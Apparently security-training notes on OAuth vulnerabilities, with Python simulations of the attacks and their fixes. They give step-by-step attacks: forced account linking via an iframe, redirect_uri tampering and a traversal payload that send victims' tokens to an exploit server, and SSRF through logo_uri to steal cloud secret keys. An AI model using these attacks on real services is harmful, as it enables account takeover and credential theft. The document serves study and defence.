OAuth
General
OAuth 2.0 was originally developed as a way of sharing access to specific data between applications. It works by defining a series of interactions between three distinct parties, namely a client application, a resource owner, and the OAuth service provider.
Client application - The website or web application that wants to access the user's data.
Resource owner - The user whose data the client application wants to access.
OAuth service provider - The website or application that controls the user's data and access to it. It supports OAuth by providing an API for interacting with both an authorization server and a resource server.
Once you know the hostname of the authorization server, always try sending a GET request to the following standard metadata endpoints; the response lists the real endpoints, the supported grant and response types, and whether dynamic client registration is available:
/.well-known/oauth-authorization-server
/.well-known/openid-configuration
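Added example, not part of the original notes: the two standard metadata URLs built from a hostname, and a pass over the returned document that picks out the settings the later sections depend on (a registration endpoint, the implicit flow, missing PKCE). Field names follow RFC 8414 and OpenID Connect Discovery; the sample document is constructed and nothing is fetched over the network.

```python
"""Discovery metadata: where to look and what to look for."""
import json


def discovery_urls(hostname):
    """Where to send the GET requests once the authorization server's hostname is known."""
    return [
        f"https://{hostname}/.well-known/oauth-authorization-server",
        f"https://{hostname}/.well-known/openid-configuration",
    ]


def summarize_metadata(doc):
    """Findings worth following up, derived from a parsed metadata document."""
    findings = []
    if "registration_endpoint" in doc:
        findings.append("dynamic client registration at " + doc["registration_endpoint"])
    # RFC 8414: when grant_types_supported is absent the default is
    # authorization_code and implicit.
    grants = doc.get("grant_types_supported", ["authorization_code", "implicit"])
    response_types = doc.get("response_types_supported", [])
    # Any response type that returns a token or id_token directly is delivered
    # in the URL fragment (implicit / hybrid flow).
    fragment_types = any(set(rt.split()) & {"token", "id_token"} for rt in response_types)
    if "implicit" in grants or fragment_types:
        findings.append("implicit flow enabled: access tokens travel in the URL fragment")
    if "code_challenge_methods_supported" not in doc:
        findings.append("no PKCE methods advertised")
    if "password" in grants:
        findings.append("resource owner password credentials grant enabled")
    return findings


# Constructed metadata document for a deliberately permissive server.
SAMPLE_METADATA = json.dumps({
    "issuer": "https://oauth.example",
    "authorization_endpoint": "https://oauth.example/auth",
    "token_endpoint": "https://oauth.example/token",
    "registration_endpoint": "https://oauth.example/reg",
    "response_types_supported": ["code", "token", "id_token token"],
    "grant_types_supported": ["authorization_code", "implicit"],
})


def load_sample():
    return json.loads(SAMPLE_METADATA)


if __name__ == "__main__":
    for url in discovery_urls("oauth.example"):
        print("GET", url)
    for finding in summarize_metadata(load_sample()):
        print("-", finding)
```

Against a live target, replace `load_sample()` with the JSON body returned by whichever of the two URLs answers with 200.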
Steal the linking code and access another user's account
If the authorization request does not send a state parameter, this is extremely interesting from an attacker's perspective: nothing ties the callback to the browser session that started the flow, so an attacker can initiate an OAuth flow themselves and then trick a user's browser into completing it. When the flow is used to link a social profile to an existing account, the attacker's social account ends up linked to the victim's account.
Start the profile-linking flow with your own social account.
Intercept the redirect back to the client application and copy the linking code (the code parameter).
Drop the request so the code is never consumed.
Serve the victim an iframe whose src is the client's callback URL carrying your code; their browser completes the linking with their own session.
Log in with your social account: you are now logged in as the victim.
Privilege escalation complete.
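Added example, not the lab's code: a client application's profile-linking callback with and without the state parameter, and the forced-linking attack described above run against both. The endpoint names, client_id, session layout and authorization codes are constructed; the authorization server is reduced to the table of codes it has issued.

```python
"""Account-linking CSRF: what the state parameter buys you."""
import hmac
import secrets
from urllib.parse import urlencode, urlparse, parse_qs

AUTH_ENDPOINT = "https://oauth.example/auth"        # assumed
CALLBACK = "https://client.example/oauth-linking"   # assumed

# Simulated authorization server: codes it has issued and the social
# account each one belongs to (constructed values).
ISSUED_CODES = {
    "attacker-code-123": "attacker@social.example",
    "alice-code-456": "alice@social.example",
}


def exchange_code(code):
    """Stand-in for the back-channel code exchange followed by a userinfo lookup."""
    return ISSUED_CODES[code]


def start_linking(session, use_state):
    """Client builds the authorization request. use_state=False reproduces the
    vulnerable request described in the notes (no state parameter at all)."""
    params = {"client_id": "demo-client", "redirect_uri": CALLBACK,
              "response_type": "code", "scope": "openid profile email"}
    if use_state:
        session["oauth_state"] = secrets.token_urlsafe(32)
        params["state"] = session["oauth_state"]
    return f"{AUTH_ENDPOINT}?{urlencode(params)}"


def finish_linking(session, callback_url, use_state):
    """Client handles the redirect back: links the social account to the
    account in `session`, or raises if this session never started the flow."""
    qs = parse_qs(urlparse(callback_url).query)
    if use_state:
        expected = session.pop("oauth_state", None)   # single use
        received = qs.get("state", [""])[0]
        if not expected or not hmac.compare_digest(expected, received):
            raise PermissionError("state mismatch")
    social = exchange_code(qs["code"][0])
    session["linked_social_account"] = social
    return social


def legitimate_linking():
    """Alice links her own social account; the state round-trips through the server."""
    session = {"user": "alice"}
    url = start_linking(session, use_state=True)
    state = parse_qs(urlparse(url).query)["state"][0]
    return finish_linking(session, f"{CALLBACK}?code=alice-code-456&state={state}", use_state=True)


def forced_linking_attack(use_state):
    """The steps from the notes: attacker starts the flow with their own social
    account, captures the code from the redirect and drops the request, then
    has the victim's browser load the callback URL (e.g. via an iframe).
    Returns the social account now linked to the victim, or None if rejected."""
    attacker, victim = {"user": "attacker"}, {"user": "admin"}
    start_linking(attacker, use_state)
    forged = f"{CALLBACK}?code=attacker-code-123"
    if "oauth_state" in attacker:
        # A state value copied from the attacker's own flow is useless: it is
        # compared against the victim's session, which never stored it.
        forged += "&state=" + attacker["oauth_state"]
    try:
        finish_linking(victim, forged, use_state)
    except PermissionError:
        return None
    return victim.get("linked_social_account")


def iframe_payload(code):
    """What the exploit server serves to the victim."""
    return f'<iframe src="{CALLBACK}?code={code}"></iframe>'


if __name__ == "__main__":
    print("legitimate:", legitimate_linking())
    print("no state  :", forced_linking_attack(use_state=False))
    print("with state:", forced_linking_attack(use_state=True))
    print(iframe_payload("attacker-code-123"))
```

The state value must be unguessable, bound to the session that created it and consumed on first use; a constant or predictable state gives no protection, since the attacker can simply include it in the forged callback URL.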
Redirect URI
If the authorization server does not validate redirect_uri, change it to point to the exploit server, then send the request and follow the redirect. Whatever the victim's browser carries to the redirect target (the authorization code, or the access token in the implicit flow) ends up in the exploit server's access log.
Redirect URI with weak protection (directory traversal)
If the server only checks that redirect_uri starts with the registered value, append a traversal sequence such as /oauth-callback/../ to escape into another path on the client and chain it with a page there that forwards the browser to the exploit server (for example an open redirect).
The victim's access token will appear in the exploit server's access log.
In Repeater, go to the GET /me request and replace the token in the Authorization: Bearer header with the one you just copied.
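Added example, not the lab's code: a prefix check on redirect_uri beside the exact-match check RFC 6749 requires, and a simulation of what the victim's browser does with the traversal payload (dot-segment removal, then an open redirect that keeps the URL fragment, so the implicit-flow token rides along to the exploit server). Hostnames, the /post/next open redirect and the token value are constructed.

```python
"""Prefix-checked redirect_uri defeated by path traversal."""
import posixpath
from urllib.parse import urlparse, urlunparse, parse_qs

REGISTERED_REDIRECT = "https://client.example/oauth-callback"   # assumed


def prefix_check(redirect_uri):
    """Vulnerable: accepts anything that begins with the registered URI."""
    return redirect_uri.startswith(REGISTERED_REDIRECT)


def exact_match(redirect_uri, registered=(REGISTERED_REDIRECT,)):
    """Hardened: RFC 6749 section 3.1.2.3 simple string comparison against the
    registered value(s). No prefixes, no server-side normalisation."""
    return redirect_uri in registered


def browser_normalise(url):
    """Browsers remove dot-segments before sending the request, so the server's
    prefix check and the URL actually visited disagree."""
    p = urlparse(url)
    path = posixpath.normpath(p.path) if p.path else "/"
    if p.path.endswith("/") and path != "/":
        path += "/"
    return urlunparse(p._replace(path=path))


def follow_open_redirect(landing_url, param="path"):
    """Simulate the client-side open redirect the traversal lands on: a 302 to
    the URL in `path`. The fragment is never sent to a server, and browsers
    carry it over to the new Location when that Location has none."""
    p = urlparse(landing_url)
    target = parse_qs(p.query).get(param, [None])[0]
    if target is None:
        return landing_url
    t = urlparse(target)
    if not t.fragment:
        t = t._replace(fragment=p.fragment)
    return urlunparse(t)


def run_traversal_attack(token="constructed-token"):
    """Walk the chain and return what each hop sees."""
    payload = REGISTERED_REDIRECT + "/../post/next?path=https://exploit.example/exploit"
    # The authorization server (implicit flow) sends the victim to redirect_uri
    # with the token in the fragment; the browser normalises the path first.
    victim_url = browser_normalise(f"{payload}#access_token={token}&token_type=Bearer")
    exploit_url = follow_open_redirect(victim_url)
    # The exploit page's script copies location.hash into a request, which is
    # how the token reaches the access log (fragments are not sent otherwise).
    log_line = "GET /?" + urlparse(exploit_url).fragment + " HTTP/1.1"
    return {
        "passes_prefix_check": prefix_check(payload),
        "passes_exact_match": exact_match(payload),
        "victim_path": urlparse(victim_url).path,
        "exploit_url": exploit_url,
        "log_line": log_line,
    }


if __name__ == "__main__":
    for k, v in run_traversal_attack("tok123").items():
        print(f"{k}: {v}")
```

Because the fragment never leaves the browser, the exploit page has to run a script that turns location.hash into a request (for example by setting window.location to its own URL with the hash as a query string); only then does the token show up in the access log.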
Unprotected dynamic client registration
Register a new client at the registration endpoint with a logo_uri that points at your Collaborator payload, and note the client_id in the response.
In Repeater, go to the GET /client/CLIENT-ID/logo request, replace CLIENT-ID in the path with the new client_id you just copied and send the request. Go to the Collaborator tab and poll for new interactions. An HTTP interaction attempting to fetch your non-existent logo confirms that the logo_uri property makes the OAuth server request any URL you supply (server-side request forgery).
Register another client whose logo_uri points at an internal URL you cannot reach directly, the one that holds the web application's cloud credentials, and note its client_id.
Go back to the GET /client/CLIENT-ID/logo request, replace CLIENT-ID with this second client_id and send the request. The response contains the sensitive metadata for the OAuth provider's cloud environment, including the secret access key.
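Added example, not the lab's code: the registration body that plants a logo_uri (RFC 7591 field names), and the check an authorization server should apply before fetching a client-supplied URL. The registration endpoint, hostnames and the fake DNS table are constructed so the example runs offline; 169.254.169.254 is the well-known cloud instance-metadata address, named here as the kind of target the internal URL in the notes points at.

```python
"""Dynamic client registration: planting a logo_uri, and validating one."""
import ipaddress
import json
import socket
from urllib.parse import urlparse


def registration_request(redirect_uris, logo_uri):
    """JSON body for a dynamic client registration POST (RFC 7591)."""
    return json.dumps({
        "redirect_uris": redirect_uris,
        "logo_uri": logo_uri,
        "client_name": "demo",
    })


# Address ranges a server-side fetch of a client-supplied URL must never reach.
# 169.254.0.0/16 covers the cloud instance-metadata service at 169.254.169.254.
BLOCKED = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]


def system_resolve(host):
    """Real resolver: every address the host name points to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


FAKE_DNS = {  # constructed, so the example runs without network access
    "collab.example": ["203.0.113.10"],
    "metadata.internal": ["169.254.169.254"],
    "dual.example": ["203.0.113.11", "10.0.0.5"],   # one public, one internal
}


def fake_resolve(host):
    try:
        return [str(ipaddress.ip_address(host))]     # literal IP address
    except ValueError:
        if host not in FAKE_DNS:
            raise OSError("NXDOMAIN")
        return FAKE_DNS[host]


def validate_logo_uri(uri, resolve=system_resolve):
    """True only if the scheme is http(s) and every address the host resolves
    to is outside the blocked ranges. The vulnerable server in the notes does
    none of this and fetches whatever it was given."""
    p = urlparse(uri)
    if p.scheme not in ("http", "https") or not p.hostname:
        return False
    try:
        addrs = resolve(p.hostname)
    except (OSError, ValueError):
        return False
    if not addrs:
        return False
    for a in addrs:
        ip = ipaddress.ip_address(a)
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped                       # ::ffff:169.254.169.254
        if any(ip in net for net in BLOCKED):
            return False
    return True


if __name__ == "__main__":
    print(registration_request(["https://client.example/cb"], "https://collab.example/logo.png"))
    for candidate in ("https://collab.example/logo.png",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://metadata.internal/"):
        print(candidate, "->", "allowed" if validate_logo_uri(candidate, fake_resolve) else "blocked")
```

A check like this is only as good as the connection that follows it: the fetch must connect to the addresses that were validated rather than resolving the name a second time, otherwise a host whose DNS answer changes between the two lookups (DNS rebinding) gets past it.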